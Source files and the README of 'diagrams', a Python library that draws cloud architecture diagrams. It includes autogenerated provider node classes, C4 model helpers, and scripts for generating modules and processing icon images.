"resources/aws/cost" class Budgets(_Cost): _icon = "budgets.png" class CostAndUsageReport(_Cost): _icon = "cost-and-usage-report.png" class CostExplorer(_Cost): _icon = "cost-explorer.png" class CostManagement(_Cost): _icon = "cost-management.png" class ReservedInstanceReporting(_Cost): _icon = "reserved-instance-reporting.png" class SavingsPlans(_Cost): _icon = "savings-plans.png" # Aliases File: diagrams/aws/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Migration(_AWS): _type = "migration" _icon_dir = "resources/aws/migration" class ApplicationDiscoveryService(_Migration): _icon = "application-discovery-service.png" class CloudendureMigration(_Migration): _icon = "cloudendure-migration.png" class DatabaseMigrationService(_Migration): _icon = "database-migration-service.png" class DatasyncAgent(_Migration): _icon = "datasync-agent.png" class Datasync(_Migration): _icon = "datasync.png" class MigrationAndTransfer(_Migration): _icon = "migration-and-transfer.png" class MigrationHub(_Migration): _icon = "migration-hub.png" class ServerMigrationService(_Migration): _icon = "server-migration-service.png" class SnowballEdge(_Migration): _icon = "snowball-edge.png" class Snowball(_Migration): _icon = "snowball.png" class Snowmobile(_Migration): _icon = "snowmobile.png" class TransferForSftp(_Migration): _icon = "transfer-for-sftp.png" # Aliases ADS = ApplicationDiscoveryService CEM = CloudendureMigration DMS = DatabaseMigrationService MAT = MigrationAndTransfer SMS = ServerMigrationService File: diagrams/aws/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Iot(_AWS): _type = "iot" _icon_dir = "resources/aws/iot" class Freertos(_Iot): _icon = "freertos.png" class InternetOfThings(_Iot): _icon = "internet-of-things.png" class Iot1Click(_Iot): _icon = "iot-1-click.png" class IotAction(_Iot): _icon = "iot-action.png" class IotActuator(_Iot): _icon = "iot-actuator.png" class IotAlexaEcho(_Iot): _icon = "iot-alexa-echo.png" class IotAlexaEnabledDevice(_Iot): _icon = "iot-alexa-enabled-device.png" class IotAlexaSkill(_Iot): _icon = "iot-alexa-skill.png" class IotAlexaVoiceService(_Iot): _icon = "iot-alexa-voice-service.png" class IotAnalyticsChannel(_Iot): _icon = "iot-analytics-channel.png" class IotAnalyticsDataSet(_Iot): _icon = "iot-analytics-data-set.png" class IotAnalyticsDataStore(_Iot): _icon = "iot-analytics-data-store.png" class IotAnalyticsNotebook(_Iot): _icon = "iot-analytics-notebook.png" class IotAnalyticsPipeline(_Iot): _icon = "iot-analytics-pipeline.png" class IotAnalytics(_Iot): _icon = "iot-analytics.png" class IotBank(_Iot): _icon = "iot-bank.png" class IotBicycle(_Iot): _icon = "iot-bicycle.png" class IotButton(_Iot): _icon = "iot-button.png" class IotCamera(_Iot): _icon = "iot-camera.png" class IotCar(_Iot): _icon = "iot-car.png" class IotCart(_Iot): _icon = "iot-cart.png" class IotCertificate(_Iot): _icon = "iot-certificate.png" class IotCoffeePot(_Iot): _icon = "iot-coffee-pot.png" class IotCore(_Iot): _icon = "iot-core.png" class IotDesiredState(_Iot): _icon = "iot-desired-state.png" class IotDeviceDefender(_Iot): _icon = "iot-device-defender.png" class IotDeviceGateway(_Iot): _icon = "iot-device-gateway.png" class IotDeviceManagement(_Iot): _icon = "iot-device-management.png" class IotDoorLock(_Iot): _icon = "iot-door-lock.png" class IotEvents(_Iot): _icon = "iot-events.png" class IotFactory(_Iot): _icon = "iot-factory.png" class IotFireTvStick(_Iot): _icon = "iot-fire-tv-stick.png" class IotFireTv(_Iot): _icon = "iot-fire-tv.png" class IotGeneric(_Iot): _icon = "iot-generic.png" class IotGreengrassConnector(_Iot): _icon = "iot-greengrass-connector.png" class IotGreengrass(_Iot): _icon = "iot-greengrass.png" class IotHardwareBoard(_Iot): _icon = "iot-hardware-board.png" class IotHouse(_Iot): _icon = "iot-house.png" class IotHttp(_Iot): _icon = "iot-http.png" class IotHttp2(_Iot): _icon = "iot-http2.png" class IotJobs(_Iot): _icon = "iot-jobs.png" class IotLambda(_Iot): _icon = "iot-lambda.png" class IotLightbulb(_Iot): _icon = "iot-lightbulb.png" class IotMedicalEmergency(_Iot): _icon = "iot-medical-emergency.png" class IotMqtt(_Iot): _icon = "iot-mqtt.png" class IotOverTheAirUpdate(_Iot): _icon = "iot-over-the-air-update.png" class IotPolicyEmergency(_Iot): _icon = "iot-policy-emergency.png" class IotPolicy(_Iot): _icon = "iot-policy.png" class IotReportedState(_Iot): _icon = "iot-reported-state.png" class IotRule(_Iot): _icon = "iot-rule.png" class IotSensor(_Iot): _icon = "iot-sensor.png" class IotServo(_Iot): _icon = "iot-servo.png" class IotShadow(_Iot): _icon = "iot-shadow.png" class IotSimulator(_Iot): _icon = "iot-simulator.png" class IotSitewise(_Iot): _icon = "iot-sitewise.png" class IotThermostat(_Iot): _icon = "iot-thermostat.png" class IotThingsGraph(_Iot): _icon = "iot-things-graph.png" class IotTopic(_Iot): _icon = "iot-topic.png" class IotTravel(_Iot): _icon = "iot-travel.png" class IotUtility(_Iot): _icon = "iot-utility.png" class IotWindfarm(_Iot): _icon = "iot-windfarm.png" # Aliases FreeRTOS = Freertos IotBoard = IotHardwareBoard File: diagrams/aws/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _General(_AWS): _type = "general" _icon_dir = "resources/aws/general" class Client(_General): _icon = "client.png" class Disk(_General): _icon = "disk.png" class Forums(_General): _icon = "forums.png" class General(_General): _icon = "general.png" class GenericDatabase(_General): _icon = "generic-database.png" class GenericFirewall(_General): _icon = "generic-firewall.png" class GenericOfficeBuilding(_General): _icon = "generic-office-building.png" class GenericSamlToken(_General): _icon = "generic-saml-token.png" class GenericSDK(_General): _icon = "generic-sdk.png" class InternetAlt1(_General): _icon = "internet-alt1.png" class InternetAlt2(_General): _icon = "internet-alt2.png" class InternetGateway(_General): _icon = "internet-gateway.png" class Marketplace(_General): _icon = "marketplace.png" class MobileClient(_General): _icon = "mobile-client.png" class Multimedia(_General): _icon = "multimedia.png" class OfficeBuilding(_General): _icon = "office-building.png" class SamlToken(_General): _icon = "saml-token.png" class SDK(_General): _icon = "sdk.png" class SslPadlock(_General): _icon = "ssl-padlock.png" class TapeStorage(_General): _icon = "tape-storage.png" class Toolkit(_General): _icon = "toolkit.png" class TraditionalServer(_General): _icon = "traditional-server.png" class User(_General): _icon = "user.png" class Users(_General): _icon = "users.png" # Aliases OfficeBuilding = GenericOfficeBuilding File: diagrams/aws/engagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Engagement(_AWS): _type = "engagement" _icon_dir = "resources/aws/engagement" class Connect(_Engagement): _icon = "connect.png" class CustomerEngagement(_Engagement): _icon = "customer-engagement.png" class Pinpoint(_Engagement): _icon = "pinpoint.png" class SimpleEmailServiceSesEmail(_Engagement): _icon = "simple-email-service-ses-email.png" class SimpleEmailServiceSes(_Engagement): _icon = "simple-email-service-ses.png" # Aliases SES = SimpleEmailServiceSes File: diagrams/aws/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Compute(_AWS): _type = "compute" _icon_dir = "resources/aws/compute" class AppRunner(_Compute): _icon = "app-runner.png" class ApplicationAutoScaling(_Compute): _icon = "application-auto-scaling.png" class Batch(_Compute): _icon = "batch.png" class ComputeOptimizer(_Compute): _icon = "compute-optimizer.png" class Compute(_Compute): _icon = "compute.png" class EC2Ami(_Compute): _icon = "ec2-ami.png" class EC2AutoScaling(_Compute): _icon = "ec2-auto-scaling.png" class EC2ContainerRegistryImage(_Compute): _icon = "ec2-container-registry-image.png" class EC2ContainerRegistryRegistry(_Compute): _icon = "ec2-container-registry-registry.png" class EC2ContainerRegistry(_Compute): _icon = "ec2-container-registry.png" class EC2ElasticIpAddress(_Compute): _icon = "ec2-elastic-ip-address.png" class EC2ImageBuilder(_Compute): _icon = "ec2-image-builder.png" class EC2Instance(_Compute): _icon = "ec2-instance.png" class EC2Instances(_Compute): _icon = "ec2-instances.png" class EC2Rescue(_Compute): _icon = "ec2-rescue.png" class EC2SpotInstance(_Compute): _icon = "ec2-spot-instance.png" class EC2(_Compute): _icon = "ec2.png" class ElasticBeanstalkApplication(_Compute): _icon = "elastic-beanstalk-application.png" class ElasticBeanstalkDeployment(_Compute): _icon = "elastic-beanstalk-deployment.png" class ElasticBeanstalk(_Compute): _icon = "elastic-beanstalk.png" class ElasticContainerServiceContainer(_Compute): _icon = "elastic-container-service-container.png" class ElasticContainerServiceService(_Compute): _icon = "elastic-container-service-service.png" class ElasticContainerService(_Compute): _icon = "elastic-container-service.png" class ElasticKubernetesService(_Compute): _icon = "elastic-kubernetes-service.png" class Fargate(_Compute): _icon = "fargate.png" class LambdaFunction(_Compute): _icon = "lambda-function.png" class Lambda(_Compute): _icon = "lambda.png" class Lightsail(_Compute): _icon = "lightsail.png" class LocalZones(_Compute): _icon = "local-zones.png" class Outposts(_Compute): _icon = "outposts.png" class ServerlessApplicationRepository(_Compute): _icon = "serverless-application-repository.png" class ThinkboxDeadline(_Compute): _icon = "thinkbox-deadline.png" class ThinkboxDraft(_Compute): _icon = "thinkbox-draft.png" class ThinkboxFrost(_Compute): _icon = "thinkbox-frost.png" class ThinkboxKrakatoa(_Compute): _icon = "thinkbox-krakatoa.png" class ThinkboxSequoia(_Compute): _icon = "thinkbox-sequoia.png" class ThinkboxStoke(_Compute): _icon = "thinkbox-stoke.png" class ThinkboxXmesh(_Compute): _icon = "thinkbox-xmesh.png" class VmwareCloudOnAWS(_Compute): _icon = "vmware-cloud-on-aws.png" class Wavelength(_Compute): _icon = "wavelength.png" # Aliases AutoScaling = ApplicationAutoScaling AMI = EC2Ami ECR = EC2ContainerRegistry EB = ElasticBeanstalk ECS = ElasticContainerService EKS = ElasticKubernetesService SAR = ServerlessApplicationRepository File: diagrams/c4/__init__.py """ A set of nodes and edges to visualize software architecture using the C4 model. """ import html import textwrap from diagrams import Cluster, Node, Edge def _format_node_label(name, key, description): """Create a graphviz label string for a C4 node""" title = f'<font point-size="12"><b>{html.escape(name)}</b></font><br/>' subtitle = f'<font point-size="9">[{html.escape(key)}]<br/></font>' if key else "" text = f'<br/><font point-size="10">{_format_description(description)}</font>' if description else "" return f"<{title}{subtitle}{text}>" def _format_description(description): """ Formats the description string so it fits into the C4 nodes. It line-breaks the description so it fits onto exactly three lines. If there are more than three lines, all further lines are discarded and "..." inserted on the last line to indicate that it was shortened. This will also html-escape the description so it can safely be included in a HTML label. """ wrapper = textwrap.TextWrapper(width=40, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] lines += [""] * (3 - len(lines)) # fill up with empty lines so it is always three return "<br/>".join(lines) def _format_edge_label(description): """Create a graphviz label string for a C4 edge""" wrapper = textwrap.TextWrapper(width=24, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] text = "<br/>".join(lines) return f'<<font point-size="10">{text}</font>>' def C4Node(name, technology="", description="", type="Container", **kwargs): key = f"{type}: {technology}" if technology else type node_attributes = { "label": _format_node_label(name, key, description), "labelloc": "c", "shape": "rect", "width": "2.6", "height": "1.6", "fixedsize": "true", "style": "filled", "fillcolor": "dodgerblue3", "fontcolor": "white", } # collapse boxes to a smaller form if they don't have a description if not description: node_attributes.update({"width": "2", "height": "1"}) node_attributes.update(kwargs) return Node(**node_attributes) def Container(name, technology="", description="", **kwargs): container_attributes = { "name": name, "technology": technology, "description": description, "type": "Container", } container_attributes.update(kwargs) return C4Node(**container_attributes) def Database(name, technology="", description="", **kwargs): database_attributes = { "name": name, "technology": technology, "description": description, "type": "Database", "shape": "cylinder", "labelloc": "b", } database_attributes.update(kwargs) return C4Node(**database_attributes) def System(name, description="", external=False, **kwargs): system_attributes = { "name": name, "description": description, "type": "External System" if external else "System", "fillcolor": "gray60" if external else "dodgerblue4", } system_attributes.update(kwargs) return C4Node(**system_attributes) def Person(name, description="", external=False, **kwargs): person_attributes = { "name": name, "description": description, "type": "External Person" if external else "Person", "fillcolor": "gray60" if external else "dodgerblue4", "style": "rounded,filled", } person_attributes.update(kwargs) return C4Node(**person_attributes) def SystemBoundary(name, **kwargs): graph_attributes = { "label": html.escape(name), "bgcolor": "white", "margin": "16", "style": "dashed", } graph_attributes.update(kwargs) return Cluster(name, graph_attr=graph_attributes) def Relationship(label="", **kwargs): edge_attributes = { "style": "dashed", "color": "gray60", "label": _format_edge_label(label) if label else "", } edge_attributes.update(kwargs) return Edge(**edge_attributes) File: diagrams/custom/__init__.py """ Custom provides the possibility of load an image to be presented as a node. """ from diagrams import Node class Custom(Node): _provider = "custom" _type = "custom" _icon_dir = None fontcolor = "#ffffff" def _load_icon(self): return self._icon def __init__(self, label, icon_path, *args, **kwargs): self._icon = icon_path super().__init__(label, *args, **kwargs) File: diagrams/saas/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Logging(_Saas): _type = "logging" _icon_dir = "resources/saas/logging" class Datadog(_Logging): _icon = "datadog.png" class Newrelic(_Logging): _icon = "newrelic.png" class Papertrail(_Logging): _icon = "papertrail.png" # Aliases DataDog = Datadog NewRelic = Newrelic File: diagrams/saas/media.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Media(_Saas): _type = "media" _icon_dir = "resources/saas/media" class Cloudinary(_Media): _icon = "cloudinary.png" # Aliases File: diagrams/saas/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Social(_Saas): _type = "social" _icon_dir = "resources/saas/social" class Facebook(_Social): _icon = "facebook.png" class Twitter(_Social): _icon = "twitter.png" # Aliases File: diagrams/saas/filesharing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Filesharing(_Saas): _type = "filesharing" _icon_dir = "resources/saas/filesharing" class Nextcloud(_Filesharing): _icon = "nextcloud.png" # Aliases File: diagrams/saas/__init__.py """ Saas provides a set of general saas services. """ from diagrams import Node class _Saas(Node): _provider = "saas" _icon_dir = "resources/saas" fontcolor = "#ffffff" File: diagrams/saas/recommendation.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Recommendation(_Saas): _type = "recommendation" _icon_dir = "resources/saas/recommendation" class Recombee(_Recommendation): _icon = "recombee.png" # Aliases File: diagrams/saas/chat.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Chat(_Saas): _type = "chat" _icon_dir = "resources/saas/chat" class Discord(_Chat): _icon = "discord.png" class Line(_Chat): _icon = "line.png" class Mattermost(_Chat): _icon = "mattermost.png" class Messenger(_Chat): _icon = "messenger.png" class RocketChat(_Chat): _icon = "rocket-chat.png" class Slack(_Chat): _icon = "slack.png" class Teams(_Chat): _icon = "teams.png" class Telegram(_Chat): _icon = "telegram.png" # Aliases File: diagrams/saas/cdn.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Cdn(_Saas): _type = "cdn" _icon_dir = "resources/saas/cdn" class Akamai(_Cdn): _icon = "akamai.png" class Cloudflare(_Cdn): _icon = "cloudflare.png" class Fastly(_Cdn): _icon = "fastly.png" # Aliases File: diagrams/saas/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Communication(_Saas): _type = "communication" _icon_dir = "resources/saas/communication" class Twilio(_Communication): _icon = "twilio.png" # Aliases File: diagrams/saas/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Analytics(_Saas): _type = "analytics" _icon_dir = "resources/saas/analytics" class Dataform(_Analytics): _icon = "dataform.png" class Snowflake(_Analytics): _icon = "snowflake.png" class Stitch(_Analytics): _icon = "stitch.png" # Aliases File: diagrams/saas/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Identity(_Saas): _type = "identity" _icon_dir = "resources/saas/identity" class Auth0(_Identity): _icon = "auth0.png" class Okta(_Identity): _icon = "okta.png" # Aliases File: diagrams/saas/alerting.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Alerting(_Saas): _type = "alerting" _icon_dir = "resources/saas/alerting" class Newrelic(_Alerting): _icon = "newrelic.png" class Opsgenie(_Alerting): _icon = "opsgenie.png" class Pagerduty(_Alerting): _icon = "pagerduty.png" class Pushover(_Alerting): _icon = "pushover.png" class Xmatters(_Alerting): _icon = "xmatters.png" # Aliases File: diagrams/base/__init__.py """ Base provides a set of general services for backend infrastructure. """ from diagrams import Node class _Base(Node): _provider = "base" _icon_dir = "resources/base" fontcolor = "#ffffff" File: scripts/generate.py import os import sys from typing import Iterable from jinja2 import Environment, FileSystemLoader, Template, exceptions import config as cfg from . import app_root_dir, doc_root_dir, resource_dir, template_dir, base_dir _usage = "Usage: generate.py <provider>" def load_tmpl(tmpl: str) -> Template: env = Environment(loader=FileSystemLoader(template_dir())) env.filters["up_or_title"] = up_or_title return env.get_template(tmpl) def up_or_title(pvd: str, s: str) -> str: if s in cfg.UPPER_WORDS.get(pvd, ()): return s.upper() if s in cfg.TITLE_WORDS.get(pvd, {}): return cfg.TITLE_WORDS[pvd][s] return s.title() def gen_classes(pvd: str, typ: str, paths: Iterable[str]) -> str: """Generate all service node classes based on resources paths with class templates.""" tmpl = load_tmpl(cfg.TMPL_MODULE) # TODO: extract the gen class metas for sharing # TODO: independent function for generating all pvd/typ/paths pairs def _gen_class_meta(path: str) -> dict: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return {"name": name, "icon": path} metas = map(_gen_class_meta, paths) aliases = cfg.ALIASES[pvd][typ] if typ in cfg.ALIASES[pvd] else {} return tmpl.render(pvd=pvd, typ=typ, metas=metas, aliases=aliases) def gen_apidoc(pvd: str, typ_paths: dict) -> str: try: default_tmp = cfg.TMPL_APIDOC.split('.') tmpl_file = f"{default_tmp[0]}_{pvd}.{default_tmp[1]}" tmpl = load_tmpl(tmpl_file) except exceptions.TemplateNotFound: tmpl = load_tmpl(cfg.TMPL_APIDOC) # TODO: remove def _gen_class_name(path: str) -> str: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return name typ_classes = {} for typ, (paths, resource_root) in sorted(typ_paths.items()): typ_classes[typ] = [] for path in paths: name = _gen_class_name(path) resource_path = os.path.join(resource_root, path) alias = cfg.ALIASES[pvd].get(typ, {}).get(name) typ_classes[typ].append({"name": name, "alias": alias, "resource_path": resource_path}) return tmpl.render(pvd=pvd, typ_classes=typ_classes) def make_module(pvd: str, typ: str, classes: str) -> None: """Create a module file""" mod_path = os.path.join(app_root_dir(pvd), f"{typ}.py") with open(mod_path, "w+") as f: f.write(classes) def make_apidoc(pvd: str, content: str) -> None: """Create an api documentation file""" mod_path = os.path.join(doc_root_dir(), f"{pvd}.md") with open(mod_path, "w+") as f: f.write(content) def generate(pvd: str) -> None: """Generates a service node classes.""" typ_paths = {} base = base_dir() for root, _, files in os.walk(resource_dir(pvd)): # Extract the names and paths from resources. files.sort() pngs = list(filter(lambda f: f.endswith(".png"), files)) paths = list(filter(lambda f: "rounded" not in f, pngs)) # Skip the top-root directory. typ = os.path.basename(root) if typ == pvd: continue resource_root = os.path.relpath(root, base) classes = gen_classes(pvd, typ, paths) make_module(pvd, typ, classes) typ_paths[typ] = (paths, resource_root) # Build API documentation apidoc = gen_apidoc(pvd, typ_paths) make_apidoc(pvd, apidoc) if __name__ == "__main__": pvd = sys.argv[1] if pvd not in cfg.PROVIDERS: sys.exit() generate(pvd) File: scripts/resource.py """ resources.py provides useful tools for resources processing. There are 2 commands available. - clean: clean and unify the resources file names with some rules. - round: generate the rounded images from the original squared images. """ import os import subprocess import sys import config as cfg from . import resource_dir _usage = "Usage: resource.py <cmd> <pvd>" def cleaner_onprem(f): f = f.replace("_", "-") return f.lower() def cleaner_aws(f): f = f.replace("_", "-") f = f.replace("@4x", "") f = f.replace("@5x", "") f = f.replace("2.0", "2-0") f = f.replace("-light-bg4x", "") f = f.replace("-light-bg", "") for p in cfg.FILE_PREFIXES["aws"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_azure(f): f = f.replace("_", "-") f = f.replace("(", "").replace(")", "") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["azure"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_gcp(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["gcp"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_ibm(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["ibm"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_firebase(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["firebase"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_k8s(f): f = f.replace("-256", "") for p in cfg.FILE_PREFIXES["k8s"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_digitalocean(f): f = f.replace("-32", "") for p in cfg.FILE_PREFIXES["digitalocean"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_alibabacloud(f): for p in cfg.FILE_PREFIXES["alibabacloud"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_oci(f): f = f.replace(" ", "-") f = f.replace("_", "-") for p in cfg.FILE_PREFIXES["oci"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_programming(f): return f.lower() def cleaner_generic(f): return f.lower() def cleaner_saas(f): return f.lower() def cleaner_elastic(f): return f.lower() def cleaner_outscale(f): return f.lower() def cleaner_openstack(f): return f.lower() cleaners = { "onprem": cleaner_onprem, "aws": cleaner_aws, "azure": cleaner_azure, "digitalocean": cleaner_digitalocean, "gcp": cleaner_gcp, "ibm": cleaner_ibm, "firebase": cleaner_firebase, "k8s": cleaner_k8s, "alibabacloud": cleaner_alibabacloud, "oci": cleaner_oci, "programming": cleaner_programming, "saas": cleaner_saas, "elastic": cleaner_elastic, "outscale": cleaner_outscale, "generic": cleaner_generic, "openstack": cleaner_openstack, } def clean_png(pvd: str) -> None: """Refine the resources files names.""" def _rename(base: str, png: str): new = cleaners[pvd](png) old_path = os.path.join(base, png) new_path = os.path.join(base, new) os.rename(old_path, new_path) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) [_rename(root, png) for png in pngs] def round_png(pvd: str) -> None: """Round the images.""" def _round(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_ROUND, *cfg.CMD_ROUND_OPTS, path]) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) paths = filter(lambda f: "rounded" not in f, pngs) [_round(root, path) for path in paths] def svg2png(pvd: str) -> None: """Convert the svg into png""" def _convert(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_SVG2PNG, *cfg.CMD_SVG2PNG_OPTS, path]) subprocess.run(["rm", path]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] def svg2png2(pvd: str) -> None: """Convert the svg into png using image magick""" def _convert(base: str, path: str): path_src = os.path.join(base, path) path_dest = path_src.replace(".svg", ".png") subprocess.run([cfg.CMD_SVG2PNG_IM, *cfg.CMD_SVG2PNG_IM_OPTS, path_src, path_dest]) subprocess.run(["rm", path_src]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] # fmt: off commands = { "clean": clean_png, "round": round_png, "svg2png": svg2png, "svg2png2": svg2png2, } # fmt: on if __name__ == "__main__": if len(sys.argv) < 3: print(_usage) sys.exit() cmd = sys.argv[1] pvd = sys.argv[2] if cmd not in commands: sys.exit() if pvd not in cfg.PROVIDERS: sys.exit() commands[cmd](pvd) File: scripts/__init__.py import os from pathlib import Path import config as cfg def base_dir() -> Path: return Path(os.path.abspath(os.path.dirname(__file__))).parent def app_root_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_APP_ROOT, pvd) def doc_root_dir() -> str: return os.path.join(base_dir(), cfg.DIR_DOC_ROOT) def resource_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_RESOURCE, pvd) def template_dir() -> str: return os.path.join(base_dir(), cfg.DIR_TEMPLATE)
![diagrams logo](assets/img/diagrams.png) # Diagrams [![license](https://img.shields.io/badge/license-MIT-blue.svg)](/LICENSE) [![pypi version](https://badge.fury.io/py/diagrams.svg)](https://badge.fury.io/py/diagrams) ![python version](https://img.shields.io/badge/python-%3E%3D%203.6-blue?logo=python) ![Run tests](https://github.com/mingrammer/diagrams/workflows/Run%20tests/badge.svg?branch=master) [![todos](https://badgen.net/https/api.tickgit.com/badgen/github.com/mingrammer/diagrams?label=todos)](https://www.tickgit.com/browse?repo=github.com/mingrammer/diagrams) ![contributors](https://img.shields.io/github/contributors/mingrammer/diagrams) <a href="https://www.buymeacoffee.com/mingrammer" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a> **Diagram as Code**. Diagrams lets you draw the cloud system architecture **in Python code**. It was born for **prototyping** a new system architecture design without any design tools. You can also describe or visualize the existing system architecture as well. Diagrams currently supports main major providers including: `AWS`, `Azure`, `GCP`, `Kubernetes`, `Alibaba Cloud`, `Oracle Cloud` etc... It also supports `On-Premise` nodes, `SaaS` and major `Programming` frameworks and languages. **Diagram as Code** also allows you to **track** the architecture diagram changes in any **version control** system. > NOTE: It does not control any actual cloud resources nor does it generate cloud formation or terraform code. It is just for drawing the cloud system architecture diagrams. ## Providers ![aws provider](https://img.shields.io/badge/AWS-orange?logo=amazon-aws&color=ff9900) ![azure provider](https://img.shields.io/badge/Azure-orange?logo=microsoft-azure&color=0089d6) ![gcp provider](https://img.shields.io/badge/GCP-orange?logo=google-cloud&color=4285f4) ![ibm provider](https://img.shields.io/badge/IBM-orange?logo=ibm&color=052FAD) ![kubernetes provider](https://img.shields.io/badge/Kubernetes-orange?logo=kubernetes&color=326ce5) ![alibaba cloud provider](https://img.shields.io/badge/AlibabaCloud-orange?logo=alibaba-cloud&color=ff6a00) ![oracle cloud provider](https://img.shields.io/badge/OracleCloud-orange?logo=oracle&color=f80000) ![openstack provider](https://img.shields.io/badge/OpenStack-orange?logo=openstack&color=da1a32) ![firebase provider](https://img.shields.io/badge/Firebase-orange?logo=firebase&color=FFCA28) ![digital ocean provider](https://img.shields.io/badge/DigitalOcean-0080ff?logo=digitalocean&color=0080ff) ![elastic provider](https://img.shields.io/badge/Elastic-orange?logo=elastic&color=005571) ![outscale provider](https://img.shields.io/badge/OutScale-orange?color=5f87bf) ![on premise provider](https://img.shields.io/badge/OnPremise-orange?color=5f87bf) ![generic provider](https://img.shields.io/badge/Generic-orange?color=5f87bf) ![programming provider](https://img.shields.io/badge/Programming-orange?color=5f87bf) ![saas provider](https://img.shields.io/badge/SaaS-orange?color=5f87bf) ![c4 provider](https://img.shields.io/badge/C4-orange?color=5f87bf) ## Getting Started It requires **Python 3.7** or higher, check your Python version first. It uses [Graphviz](https://www.graphviz.org/) to render the diagram, so you need to [install Graphviz](https://graphviz.gitlab.io/download/) to use **diagrams**. After installing graphviz (or already have it), install the **diagrams**. > macOS users can download the Graphviz via `brew install graphviz` if you're using [Homebrew](https://brew.sh). ```shell # using pip (pip3) $ pip install diagrams # using pipenv $ pipenv install diagrams # using poetry $ poetry add diagrams ``` You can start with [quick start](https://diagrams.mingrammer.com/docs/getting-started/installation#quick-start). Check out [guides](https://diagrams.mingrammer.com/docs/guides/diagram) for more details, and you can find all available nodes list in [here](https://diagrams.mingrammer.com/docs/nodes/aws). ## Examples | Event Processing | Stateful Architecture | Advanced Web Service | | ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | | ![event processing](https://diagrams.mingrammer.com/img/event_processing_diagram.png) | ![stateful architecture](https://diagrams.mingrammer.com/img/stateful_architecture_diagram.png) | ![advanced web service with on-premise](https://diagrams.mingrammer.com/img/advanced_web_service_with_on-premise.png) | You can find all the examples on the [examples](https://diagrams.mingrammer.com/docs/getting-started/examples) page. ## Contributing To contribute to diagram, check out [contribution guidelines](CONTRIBUTING.md). > Let me know if you are using diagrams! I'll add you in showcase page. (I'm working on it!) :) ## Who uses it? [Apache Airflow](https://github.com/apache/airflow) is the most popular data workflow Orchestrator. Airflow uses Diagrams to generate architecture diagrams in their documentation. [Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you to analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It allows you to create a diagram of analyzed cloud resource map based on this Diagrams library, so you can draw your existing cloud infrastructure with Cloudiscovery. [Airflow Diagrams](https://github.com/feluelle/airflow-diagrams) is an Airflow plugin that aims to easily visualise your Airflow DAGs on service level from providers like AWS, GCP, Azure, etc. via diagrams. ## Other languages - If you are familiar with Go, you can use [go-diagrams](https://github.com/blushft/go-diagrams) as well. ## License [MIT](LICENSE)
Mask_RCNN
3deaec5d902d16e1daf56b62d5971d428dc920bc
